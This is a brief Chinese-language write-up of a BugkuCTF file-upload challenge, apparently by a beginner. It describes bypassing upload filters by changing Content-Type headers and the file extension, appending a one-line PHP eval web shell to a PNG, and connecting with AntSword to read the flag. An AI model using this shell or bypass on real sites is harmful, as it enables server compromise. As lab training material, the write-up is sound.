bugkuctf-web-文件上传（kali操作）

一、题目描述二、启动场景My name is margin,give me a image file not a php可以上传图片但不可以上传php文件说明存在三个过滤请求头部的 Content-Type文件后缀请求数据的Content-Type三、解题流程1、上传文件就想到可以用burpsuite抓包修改数据先在本地找个截图上传(建议截图小一点一小块就行)点击submit的时候开始抓包并右键选择send to repeat送到repeat模块2.修改请求头请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如 mulTipart/form-data所上传的文件后缀 改为 .php4请求数据的Content-Type 内容改为 image /jpeg在PNG文件末尾添加一句木马?php eval($_POST[cmd]); ?3.重新发送请求后的数据数据修改好后点击send发送会显示4.打开蚁剑进行连接右键点击添加数据注意URL地址不要有额外的参数只有IP地址和bp返回的链接密码是木马里面的参数这里是cmd。最后最后最后一定记得点添加5.找flag双击进入回到根目录找到flag双击打开即可获得四、声明这篇文章是我首次所创格式不太美观请将就一下主要是因为我看其他人的答题心得对新手来说别问我咋看出来的我就是新手不太容易理解和操作所以就结合一些他们的心得进行创作。